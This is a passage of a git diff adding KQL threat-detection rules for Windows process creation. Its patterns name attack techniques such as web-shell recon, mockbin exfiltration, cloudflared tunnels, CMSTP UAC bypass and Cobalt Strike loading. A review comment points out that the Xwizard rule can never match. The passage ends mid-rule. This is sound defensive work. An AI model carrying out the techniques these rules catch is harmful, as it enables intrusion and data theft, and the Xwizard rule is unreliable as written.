+DeviceProcessEvents
+| where (ProcessCommandLine contains "&ipconfig&echo" or ProcessCommandLine contains "&quser&echo" or ProcessCommandLine contains "&whoami&echo" or ProcessCommandLine contains "&c:&echo" or ProcessCommandLine contains "&cd&echo" or ProcessCommandLine contains "&dir&echo" or ProcessCommandLine contains "&echo [E]" or ProcessCommandLine contains "&echo [S]") and (FolderPath endswith "\\w3wp.exe" or InitiatingProcessFolderPath endswith "\\w3wp.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/chromium_browser_headless_execution_to_mockbin_like_site.kql b/KQL/rules/windows/process_creation/chromium_browser_headless_execution_to_mockbin_like_site.kql
new file mode 100644
index 00000000..6d2ad8c8
--- /dev/null
+++ b/KQL/rules/windows/process_creation/chromium_browser_headless_execution_to_mockbin_like_site.kql
@@ -0,0 +1,10 @@
+// Title: Chromium Browser Headless Execution To Mockbin Like Site
+// Author: X__Junior (Nextron Systems)
+// Date: 2023-09-11
+// Level: high
+// Description: Detects the execution of a Chromium based browser process with the "headless" flag and a URL pointing to the mockbin.org service (which can be used to exfiltrate data).
+// MITRE Tactic: Execution
+// Tags: attack.execution
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "--headless" and (FolderPath endswith "\\brave.exe" or FolderPath endswith "\\chrome.exe" or FolderPath endswith "\\msedge.exe" or FolderPath endswith "\\opera.exe" or FolderPath endswith "\\vivaldi.exe") and (ProcessCommandLine contains "://run.mocky" or ProcessCommandLine contains "://mockbin")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/chromium_browser_instance_executed_with_custom_extension.kql b/KQL/rules/windows/process_creation/chromium_browser_instance_executed_with_custom_extension.kql
new file mode 100644
index 00000000..5d987340
--- /dev/null
+++ b/KQL/rules/windows/process_creation/chromium_browser_instance_executed_with_custom_extension.kql
@@ -0,0 +1,12 @@
+// Title: Chromium Browser Instance Executed With Custom Extension
+// Author: Aedan Russell, frack113, X__Junior (Nextron Systems)
+// Date: 2022-06-19
+// Level: medium
+// Description: Detects a Chromium based browser process with the 'load-extension' flag to start a instance with a custom extension
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.t1176.001
+// False Positives:
+// - Usage of Chrome Extensions in testing tools such as BurpSuite will trigger this alert
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "--load-extension=" and (FolderPath endswith "\\brave.exe" or FolderPath endswith "\\chrome.exe" or FolderPath endswith "\\msedge.exe" or FolderPath endswith "\\opera.exe" or FolderPath endswith "\\vivaldi.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/cloudflared_portable_execution.kql b/KQL/rules/windows/process_creation/cloudflared_portable_execution.kql
new file mode 100644
index 00000000..d99d96f1
--- /dev/null
+++ b/KQL/rules/windows/process_creation/cloudflared_portable_execution.kql
@@ -0,0 +1,12 @@
+// Title: Cloudflared Portable Execution
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-12-20
+// Level: medium
+// Description: Detects the execution of the "cloudflared" binary from a non standard location.
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1090.001
+// False Positives:
+// - Legitimate usage of Cloudflared portable versions
+
+DeviceProcessEvents
+| where FolderPath endswith "\\cloudflared.exe" and (not((FolderPath contains ":\\Program Files (x86)\\cloudflared\\" or FolderPath contains ":\\Program Files\\cloudflared\\")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/cloudflared_quick_tunnel_execution.kql b/KQL/rules/windows/process_creation/cloudflared_quick_tunnel_execution.kql
new file mode 100644
index 00000000..ff33f70f
--- /dev/null
+++ b/KQL/rules/windows/process_creation/cloudflared_quick_tunnel_execution.kql
@@ -0,0 +1,14 @@
+// Title: Cloudflared Quick Tunnel Execution
+// Author: Sajid Nawaz Khan
+// Date: 2023-12-20
+// Level: medium
+// Description: Detects creation of an ad-hoc Cloudflare Quick Tunnel, which can be used to tunnel local services such as HTTP, RDP, SSH and SMB.
+// The free TryCloudflare Quick Tunnel will generate a random subdomain on trycloudflare[.]com, following a call to api[.]trycloudflare[.]com.
+// The tool has been observed in use by threat groups including Akira ransomware.
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1090.001
+// False Positives:
+// - Legitimate usage of Cloudflare Quick Tunnel
+
+DeviceProcessEvents
+| where (((FolderPath endswith "\\cloudflared.exe" or FolderPath endswith "\\cloudflared-windows-386.exe" or FolderPath endswith "\\cloudflared-windows-amd64.exe") or (SHA256 startswith "2fb6c04c4f95fb8d158af94c137f90ac820716deaf88d8ebec956254e046cb29" or SHA256 startswith "b3d21940a10fdef5e415ad70331ce257c24fe3bcf7722262302e0421791f87e8" or SHA256 startswith "1fbd8362b2d2d2e6a5750ae3db69cd1815e6c1d31da48a98b796450971a8e039" or SHA256 startswith "0409c9b12f9d0eda86e461ed9bdabeefb00172b26322079681a0bdf48e68dc28" or SHA256 startswith "7cfb411d04bac42ef93d1f0c93c0a481e38c6f4612b97ae89d4702595988edc7" or SHA256 startswith "5b3c2d846ab162dc6bc595cce3a49de5731afde5d6060be7066d21b013a28373" or SHA256 startswith "ce95df7f69664c3df19b76028e115931919a71517b776da7b42d353e2ff4a670" or SHA256 startswith "1293525a19cfe3bc8296b62fbfe19f083632ed644a1c18c10b045a1d3030d81a" or SHA256 startswith "af2b9161cfcb654b16408cd6b098afe9d1fb61a037d18d7090a119d4c0c8e0f0" or SHA256 startswith "39ddceb56a15798826a5fc4892fa2b474c444bb4d7a8bf2fa95e41cab10fa7a1" or SHA256 startswith "ccd11f2328023a0e7929e845d5b6e7bc783fb4650d65faef3ae090239d4bbce2" or SHA256 startswith "b6e5c5d2567ae8c69cc012ebcae30e6c9b5359d64a58d17ba75ec89f8bce71ac" or SHA256 startswith "f813484ea441404f18caad96f28138e8aaf0cb256163c09c2ab8a3acab87f69f" or SHA256 startswith "fc4a0802ab9c7409b892ca00636bec61e2acfc911bccfdeb9978b8ab5a2f828d" or SHA256 startswith "083150724b49604c8765c1ba19541fa260b133be0acb0647fcd936d81f054499" or SHA256 startswith "44303d6572956f28a0f2e4b188934fb9874f2584f5c81fa431a463cfbf28083b" or SHA256 startswith "5d38c46032a58e28ae5f7d174d8761ec3d64d186677f3ec53af5f51afb9bfd2f" or SHA256 startswith "e1e70fa42059911bc6685fafef957f9a73fc66f214d0704a9b932683a5204032" or SHA256 startswith "c01356092a365b84f84f0e66870bd1a05ba3feb53cafd973fa5fea2534bee234" or SHA256 startswith "b3f9c06151e30ee43d39e788a79cd918a314f24e04fe87f3de8272a2057b624f" or SHA256 startswith "cd81b2792f0739f473c31c9cb7cf2313154bfa28b839975802b90e8790bb5058" or SHA256 startswith "9ec7e6c8e1bfd883663d8d9d62c9e4f9ae373b731407181e32491b27a7218a2c" or SHA256 startswith "c2cfd23fdc6c0e1b1ffa0e545cbe556f18d11b362b4a89ba0713f6ab01c4827f" or SHA256 startswith "53f8adbd76c0eb16f5e43cadde422474d8a06f9c8f959389c1930042ad8beaa5" or SHA256 startswith "648c8d2f8001c113d2986dd00b7bbd181593d462bef73522cee212c4f71f95b3" or SHA256 startswith "ae047e2095e46c3f9c518b2be67ec753f4f0aad23b261a361fcb6144dcdb63b4" or SHA256 startswith "3153d2baa462978dd22ab33d1c2274ecc88c200225d6a3327f98d5b752d08f5c" or SHA256 startswith "f49cde976e628012c9db73e1c8d76081944ecf2297cdafeb78bb13290da274c4" or SHA256 startswith "d2513e58bb03ccc83affde685c6ef987924c37ce6707d8e9857e2524b0d7e90f" or SHA256 startswith "bb67c7623ba92fe64ffd9816b8d5b3b1ea3013960a30bd4cf6e295b3eb5b1bad" or SHA256 startswith "b34b3c3a91e3165d1481f0b3ec23eab93a1cfba94345a6cbfe5b18ddbd48eac7" or SHA256 startswith "f7848034e010d55f15e474ca998f96391e320ff29b00cfcc4c5e536529703e75" or SHA256 startswith "b6fc9493778cbe3bfc062d73f5cc604bc0ff058bc5e5dc6aac87f3a4008b54b6" or SHA256 startswith "f5c5e962577e2293c4ad10603816dce7cc273585969615fbf4e4bfa9eaff1688" or SHA256 startswith "d14c52d9220b606f428a8fe9f7c108b0d6f14cf71e7384749e98e6a95962e68f" or SHA256 startswith "d3a0e1a79158f3985cd49607ebe0cdfcc49cb9af96b8f43aefd0cdfe2f22e663" or SHA256 startswith "2fbbfc8299537ff80cadf9d0e27c223fe0ccb9052bf9d8763ad717bbfa521c77" or SHA256 startswith "19074674c6fbdaa573b3081745e5e26144fdf7a086d14e0e220d1814f1f13078")) and ((ProcessCommandLine contains "-url" and ProcessCommandLine contains "tunnel") or (ProcessCommandLine contains ".exe -url" or ProcessCommandLine contains ".exe --url"))) or (ProcessCommandLine contains "-url" and ProcessCommandLine contains "-no-autoupdate")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/cloudflared_tunnel_connections_cleanup.kql b/KQL/rules/windows/process_creation/cloudflared_tunnel_connections_cleanup.kql
new file mode 100644
index 00000000..5eef217c
--- /dev/null
+++ b/KQL/rules/windows/process_creation/cloudflared_tunnel_connections_cleanup.kql
@@ -0,0 +1,12 @@
+// Title: Cloudflared Tunnel Connections Cleanup
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-05-17
+// Level: medium
+// Description: Detects execution of the "cloudflared" tool with the tunnel "cleanup" flag in order to cleanup tunnel connections.
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1102, attack.t1090, attack.t1572
+// False Positives:
+// - Legitimate usage of Cloudflared.
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "-config " or ProcessCommandLine contains "-connector-id ") and (ProcessCommandLine contains " tunnel " and ProcessCommandLine contains "cleanup ")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/cloudflared_tunnel_execution.kql b/KQL/rules/windows/process_creation/cloudflared_tunnel_execution.kql
new file mode 100644
index 00000000..491b6dac
--- /dev/null
+++ b/KQL/rules/windows/process_creation/cloudflared_tunnel_execution.kql
@@ -0,0 +1,12 @@
+// Title: Cloudflared Tunnel Execution
+// Author: Janantha Marasinghe, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-05-17
+// Level: medium
+// Description: Detects execution of the "cloudflared" tool to connect back to a tunnel. This was seen used by threat actors to maintain persistence and remote access to compromised networks.
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1102, attack.t1090, attack.t1572
+// False Positives:
+// - Legitimate usage of Cloudflared tunnel.
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "-config " or ProcessCommandLine contains "-credentials-contents " or ProcessCommandLine contains "-credentials-file " or ProcessCommandLine contains "-token ") and (ProcessCommandLine contains " tunnel " and ProcessCommandLine contains " run ")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/cmd_exe_missing_space_characters_execution_anomaly.kql b/KQL/rules/windows/process_creation/cmd_exe_missing_space_characters_execution_anomaly.kql
new file mode 100644
index 00000000..98de6b57
--- /dev/null
+++ b/KQL/rules/windows/process_creation/cmd_exe_missing_space_characters_execution_anomaly.kql
@@ -0,0 +1,11 @@
+// Title: Cmd.EXE Missing Space Characters Execution Anomaly
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-08-23
+// Level: high
+// Description: Detects Windows command lines that miss a space before or after the /c flag when running a command using the cmd.exe.
+// This could be a sign of obfuscation of a fat finger problem (typo by the developer).
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.001
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains "cmd.exe/c" or ProcessCommandLine contains "\\cmd/c" or ProcessCommandLine contains "\"cmd/c" or ProcessCommandLine contains "cmd.exe/k" or ProcessCommandLine contains "\\cmd/k" or ProcessCommandLine contains "\"cmd/k" or ProcessCommandLine contains "cmd.exe/r" or ProcessCommandLine contains "\\cmd/r" or ProcessCommandLine contains "\"cmd/r") or (ProcessCommandLine contains "/cwhoami" or ProcessCommandLine contains "/cpowershell" or ProcessCommandLine contains "/cschtasks" or ProcessCommandLine contains "/cbitsadmin" or ProcessCommandLine contains "/ccertutil" or ProcessCommandLine contains "/kwhoami" or ProcessCommandLine contains "/kpowershell" or ProcessCommandLine contains "/kschtasks" or ProcessCommandLine contains "/kbitsadmin" or ProcessCommandLine contains "/kcertutil") or (ProcessCommandLine contains "cmd.exe /c" or ProcessCommandLine contains "cmd /c" or ProcessCommandLine contains "cmd.exe /k" or ProcessCommandLine contains "cmd /k" or ProcessCommandLine contains "cmd.exe /r" or ProcessCommandLine contains "cmd /r")) and (not(((ProcessCommandLine in~ ("cmd.exe /c") or ProcessCommandLine contains "AppData\\Local\\Programs\\Microsoft VS Code\\resources\\app\\node_modules" or ProcessCommandLine endswith "cmd.exe/c .") or (ProcessCommandLine contains "cmd.exe /c " or ProcessCommandLine contains "cmd /c " or ProcessCommandLine contains "cmd.exe /k " or ProcessCommandLine contains "cmd /k " or ProcessCommandLine contains "cmd.exe /r " or ProcessCommandLine contains "cmd /r "))))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/cmstp_execution_process_creation.kql b/KQL/rules/windows/process_creation/cmstp_execution_process_creation.kql
new file mode 100644
index 00000000..223ba1a2
--- /dev/null
+++ b/KQL/rules/windows/process_creation/cmstp_execution_process_creation.kql
@@ -0,0 +1,12 @@
+// Title: CMSTP Execution Process Creation
+// Author: Nik Seetharaman
+// Date: 2018-07-16
+// Level: high
+// Description: Detects various indicators of Microsoft Connection Manager Profile Installer execution
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.execution, attack.t1218.003, attack.g0069, car.2019-04-001
+// False Positives:
+// - Legitimate CMSTP use (unlikely in modern enterprise environments)
+
+DeviceProcessEvents
+| where InitiatingProcessFolderPath endswith "\\cmstp.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/cmstp_uac_bypass_via_com_object_access.kql b/KQL/rules/windows/process_creation/cmstp_uac_bypass_via_com_object_access.kql
new file mode 100644
index 00000000..4747747d
--- /dev/null
+++ b/KQL/rules/windows/process_creation/cmstp_uac_bypass_via_com_object_access.kql
@@ -0,0 +1,12 @@
+// Title: CMSTP UAC Bypass via COM Object Access
+// Author: Nik Seetharaman, Christian Burkard (Nextron Systems)
+// Date: 2019-07-31
+// Level: high
+// Description: Detects UAC Bypass Attempt Using Microsoft Connection Manager Profile Installer Autoelevate-capable COM Objects (e.g. UACMe ID of 41, 43, 58 or 65)
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.defense-evasion, attack.privilege-escalation, attack.t1548.002, attack.t1218.003, attack.g0069, car.2019-04-001
+// False Positives:
+// - Legitimate CMSTP use (unlikely in modern enterprise environments)
+
+DeviceProcessEvents
+| where (ProcessIntegrityLevel in~ ("High", "System", "S-1-16-16384", "S-1-16-12288")) and (InitiatingProcessCommandLine contains " /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}" or InitiatingProcessCommandLine contains " /Processid:{3E000D72-A845-4CD9-BD83-80C07C3B881F}" or InitiatingProcessCommandLine contains " /Processid:{BD54C901-076B-434E-B6C7-17C531F4AB41}" or InitiatingProcessCommandLine contains " /Processid:{D2E7041B-2927-42FB-8E9F-7CE93B6DC937}" or InitiatingProcessCommandLine contains " /Processid:{E9495B87-D950-4AB5-87A5-FF6D70BF3E90}") and InitiatingProcessFolderPath endswith "\\DllHost.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/cobaltstrike_load_by_rundll32.kql b/KQL/rules/windows/process_creation/cobaltstrike_load_by_rundll32.kql
new file mode 100644
index 00000000..3d9c8427
--- /dev/null
+++ b/KQL/rules/windows/process_creation/cobaltstrike_load_by_rundll32.kql
@@ -0,0 +1,10 @@
+// Title: CobaltStrike Load by Rundll32
+// Author: Wojciech Lesicki
+// Date: 2021-06-01
+// Level: high
+// Description: Rundll32 can be use by Cobalt Strike with StartW function to load DLLs from the command line.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218.011
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains ".dll" and (ProcessCommandLine endswith " StartW" or ProcessCommandLine endswith ",StartW")) and (FolderPath endswith "\\rundll32.exe" or ProcessVersionInfoOriginalFileName =~ "RUNDLL32.EXE" or (ProcessCommandLine contains "rundll32.exe" or ProcessCommandLine contains "rundll32 "))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/code_execution_via_pcwutl_dll.kql b/KQL/rules/windows/process_creation/code_execution_via_pcwutl_dll.kql
new file mode 100644
index 00000000..e4e47e90
--- /dev/null
+++ b/KQL/rules/windows/process_creation/code_execution_via_pcwutl_dll.kql
@@ -0,0 +1,12 @@
+// Title: Code Execution via Pcwutl.dll
+// Author: Julia Fomina, oscd.community
+// Date: 2020-10-05
+// Level: medium
+// Description: Detects launch of executable by calling the LaunchApplication function from pcwutl.dll library.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218.011
+// False Positives:
+// - Use of Program Compatibility Troubleshooter Helper
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "pcwutl" and ProcessCommandLine contains "LaunchApplication") and (FolderPath endswith "\\rundll32.exe" or ProcessVersionInfoOriginalFileName =~ "RUNDLL32.EXE")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/codepage_modification_via_mode_com_to_russian_language.kql b/KQL/rules/windows/process_creation/codepage_modification_via_mode_com_to_russian_language.kql
new file mode 100644
index 00000000..f6a05000
--- /dev/null
+++ b/KQL/rules/windows/process_creation/codepage_modification_via_mode_com_to_russian_language.kql
@@ -0,0 +1,13 @@
+// Title: CodePage Modification Via MODE.COM To Russian Language
+// Author: Joseliyo Sanchez, @Joseliyo_Jstnk
+// Date: 2024-01-17
+// Level: medium
+// Description: Detects a CodePage modification using the "mode.com" utility to Russian language.
+// This behavior has been used by threat actors behind Dharma ransomware.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1036
+// False Positives:
+// - Russian speaking people changing the CodePage
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains " con " and ProcessCommandLine contains " cp " and ProcessCommandLine contains " select=") and (ProcessCommandLine endswith "=1251" or ProcessCommandLine endswith "=866")) and (FolderPath endswith "\\mode.com" or ProcessVersionInfoOriginalFileName =~ "MODE.COM")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/com_object_execution_via_xwizard_exe.kql b/KQL/rules/windows/process_creation/com_object_execution_via_xwizard_exe.kql
new file mode 100644
index 00000000..89f77414
--- /dev/null
+++ b/KQL/rules/windows/process_creation/com_object_execution_via_xwizard_exe.kql
@@ -0,0 +1,11 @@
+// Title: COM Object Execution via Xwizard.EXE
+// Author: Ensar Şamil, @sblmsrsn, @oscd_initiative, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2020-10-07
+// Level: medium
+// Description: Detects the execution of Xwizard tool with the "RunWizard" flag and a GUID like argument.
+// This utility can be abused in order to run custom COM object created in the registry.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218
+
+DeviceProcessEvents
+| where ProcessCommandLine =~ "RunWizard" and ProcessCommandLine matches regex "\\{[a-fA-F0-9]{8}-[a-fA-F0-9]{4}-[a-fA-F0-9]{4}-[a-fA-F0-9]{4}-[a-fA-F0-9]{12}\\}"
\ No newline at end of file
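Review bot: The Xwizard rule's `where` clause can never match: `ProcessCommandLine =~ "RunWizard"` is a case-insensitive equality test, so the entire command line would have to be exactly `RunWizard`, which is incompatible with the GUID regex the second predicate requires on the same field. Every other rule in this batch renders a Sigma substring token as `contains`, so this looks like a converter mapping error for this particular modifier rather than an intentional exact match. Change the first predicate to `ProcessCommandLine contains "RunWizard"` and add a converter check that flags an equality and a regex test on the same field, since a dead rule fails silently in production.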
diff --git a/KQL/rules/windows/process_creation/command_line_execution_with_suspicious_url_and_appdata_strings.kql b/KQL/rules/windows/process_creation/command_line_execution_with_suspicious_url_and_appdata_strings.kql
new file mode 100644
index 00000000..336fc214
--- /dev/null
+++ b/KQL/rules/windows/process_creation/command_line_execution_with_suspicious_url_and_appdata_strings.kql
@@ -0,0 +1,12 @@
+// Title: Command Line Execution with Suspicious URL and AppData Strings
+// Author: Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community
+// Date: 2019-01-16
+// Level: medium
+// Description: Detects a suspicious command line execution that includes an URL and AppData string in the command line parameters as used by several droppers (js/vbs > powershell)
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.command-and-control, attack.t1059.003, attack.t1059.001, attack.t1105
+// False Positives:
+// - High
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "http" and ProcessCommandLine contains "://" and ProcessCommandLine contains "%AppData%") and FolderPath endswith "\\cmd.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/compress_data_and_lock_with_password_for_exfiltration_with_7_zip.kql b/KQL/rules/windows/process_creation/compress_data_and_lock_with_password_for_exfiltration_with_7_zip.kql
new file mode 100644
index 00000000..85a13b25
--- /dev/null
+++ b/KQL/rules/windows/process_creation/compress_data_and_lock_with_password_for_exfiltration_with_7_zip.kql
@@ -0,0 +1,12 @@
+// Title: Compress Data and Lock With Password for Exfiltration With 7-ZIP
+// Author: frack113
+// Date: 2021-07-27
+// Level: medium
+// Description: An adversary may compress or encrypt data that is collected prior to exfiltration using 3rd party utilities
+// MITRE Tactic: Collection
+// Tags: attack.collection, attack.t1560.001
+// False Positives:
+// - Legitimate activity is expected since compressing files with a password is common.
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains " a " or ProcessCommandLine contains " u ") and (ProcessVersionInfoFileDescription contains "7-Zip" or (FolderPath endswith "\\7z.exe" or FolderPath endswith "\\7zr.exe" or FolderPath endswith "\\7za.exe") or (ProcessVersionInfoOriginalFileName in~ ("7z.exe", "7za.exe"))) and ProcessCommandLine contains " -p"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/compress_data_and_lock_with_password_for_exfiltration_with_winzip.kql b/KQL/rules/windows/process_creation/compress_data_and_lock_with_password_for_exfiltration_with_winzip.kql
new file mode 100644
index 00000000..12d2bac8
--- /dev/null
+++ b/KQL/rules/windows/process_creation/compress_data_and_lock_with_password_for_exfiltration_with_winzip.kql
@@ -0,0 +1,10 @@
+// Title: Compress Data and Lock With Password for Exfiltration With WINZIP
+// Author: frack113
+// Date: 2021-07-27
+// Level: medium
+// Description: An adversary may compress or encrypt data that is collected prior to exfiltration using 3rd party utilities
+// MITRE Tactic: Collection
+// Tags: attack.collection, attack.t1560.001
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains " -min " or ProcessCommandLine contains " -a ") and ProcessCommandLine contains "-s\"" and (ProcessCommandLine contains "winzip.exe" or ProcessCommandLine contains "winzip64.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/compressed_file_creation_via_tar_exe.kql b/KQL/rules/windows/process_creation/compressed_file_creation_via_tar_exe.kql
new file mode 100644
index 00000000..dec61767
--- /dev/null
+++ b/KQL/rules/windows/process_creation/compressed_file_creation_via_tar_exe.kql
@@ -0,0 +1,13 @@
+// Title: Compressed File Creation Via Tar.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems), AdmU3
+// Date: 2023-12-19
+// Level: low
+// Description: Detects execution of "tar.exe" in order to create a compressed file.
+// Adversaries may abuse various utilities to compress or encrypt data before exfiltration.
+// MITRE Tactic: Collection
+// Tags: attack.collection, attack.exfiltration, attack.t1560, attack.t1560.001
+// False Positives:
+// - Likely
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "-c" or ProcessCommandLine contains "-r" or ProcessCommandLine contains "-u") and (FolderPath endswith "\\tar.exe" or ProcessVersionInfoOriginalFileName =~ "bsdtar")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/compressed_file_extraction_via_tar_exe.kql b/KQL/rules/windows/process_creation/compressed_file_extraction_via_tar_exe.kql
new file mode 100644
index 00000000..2ff126a0
--- /dev/null
+++ b/KQL/rules/windows/process_creation/compressed_file_extraction_via_tar_exe.kql
@@ -0,0 +1,13 @@
+// Title: Compressed File Extraction Via Tar.EXE
+// Author: AdmU3
+// Date: 2023-12-19
+// Level: low
+// Description: Detects execution of "tar.exe" in order to extract compressed file.
+// Adversaries may abuse various utilities in order to decompress data to avoid detection.
+// MITRE Tactic: Collection
+// Tags: attack.collection, attack.exfiltration, attack.t1560, attack.t1560.001
+// False Positives:
+// - Likely
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "-x" and (FolderPath endswith "\\tar.exe" or ProcessVersionInfoOriginalFileName =~ "bsdtar")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/computer_discovery_and_export_via_get_adcomputer_cmdlet.kql b/KQL/rules/windows/process_creation/computer_discovery_and_export_via_get_adcomputer_cmdlet.kql
new file mode 100644
index 00000000..04dd2819
--- /dev/null
+++ b/KQL/rules/windows/process_creation/computer_discovery_and_export_via_get_adcomputer_cmdlet.kql
@@ -0,0 +1,12 @@
+// Title: Computer Discovery And Export Via Get-ADComputer Cmdlet
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-11-10
+// Level: medium
+// Description: Detects usage of the Get-ADComputer cmdlet to collect computer information and output it to a file
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1033
+// False Positives:
+// - Legitimate admin scripts may use the same technique, it's better to exclude specific computers or users who execute these commands or scripts often
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains " > " or ProcessCommandLine contains " | Select " or ProcessCommandLine contains "Out-File" or ProcessCommandLine contains "Set-Content" or ProcessCommandLine contains "Add-Content") and (ProcessCommandLine contains "Get-ADComputer " and ProcessCommandLine contains " -Filter *")) and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/computer_password_change_via_ksetup_exe.kql b/KQL/rules/windows/process_creation/computer_password_change_via_ksetup_exe.kql
new file mode 100644
index 00000000..0a39ead9
--- /dev/null
+++ b/KQL/rules/windows/process_creation/computer_password_change_via_ksetup_exe.kql
@@ -0,0 +1,10 @@
+// Title: Computer Password Change Via Ksetup.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-04-06
+// Level: medium
+// Description: Detects password change for the computer's domain account or host principal via "ksetup.exe"
+// MITRE Tactic: Execution
+// Tags: attack.execution
+
+DeviceProcessEvents
+| where ProcessCommandLine contains " /setcomputerpassword " and (FolderPath endswith "\\ksetup.exe" or ProcessVersionInfoOriginalFileName =~ "ksetup.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/computer_system_reconnaissance_via_wmic_exe.kql b/KQL/rules/windows/process_creation/computer_system_reconnaissance_via_wmic_exe.kql
new file mode 100644
index 00000000..9658071a
--- /dev/null
+++ b/KQL/rules/windows/process_creation/computer_system_reconnaissance_via_wmic_exe.kql
@@ -0,0 +1,10 @@
+// Title: Computer System Reconnaissance Via Wmic.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-09-08
+// Level: medium
+// Description: Detects execution of wmic utility with the "computersystem" flag in order to obtain information about the machine such as the domain, username, model, etc.
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.execution, attack.t1047
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "computersystem" and (FolderPath endswith "\\wmic.exe" or ProcessVersionInfoOriginalFileName =~ "wmic.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/conhost_exe_commandline_path_traversal.kql b/KQL/rules/windows/process_creation/conhost_exe_commandline_path_traversal.kql
new file mode 100644
index 00000000..157399cb
--- /dev/null
+++ b/KQL/rules/windows/process_creation/conhost_exe_commandline_path_traversal.kql
@@ -0,0 +1,12 @@
+// Title: Conhost.exe CommandLine Path Traversal
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-06-14
+// Level: high
+// Description: detects the usage of path traversal in conhost.exe indicating possible command/argument confusion/hijacking
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.003
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "/../../" and InitiatingProcessCommandLine contains "conhost"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/conhost_spawned_by_uncommon_parent_process.kql b/KQL/rules/windows/process_creation/conhost_spawned_by_uncommon_parent_process.kql
new file mode 100644
index 00000000..759237ba
--- /dev/null
+++ b/KQL/rules/windows/process_creation/conhost_spawned_by_uncommon_parent_process.kql
@@ -0,0 +1,10 @@
+// Title: Conhost Spawned By Uncommon Parent Process
+// Author: Tim Rauch, Elastic (idea)
+// Date: 2022-09-28
+// Level: medium
+// Description: Detects when the Console Window Host (conhost.exe) process is spawned by an uncommon parent process, which could be indicative of potential code injection activity.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059
+
+DeviceProcessEvents
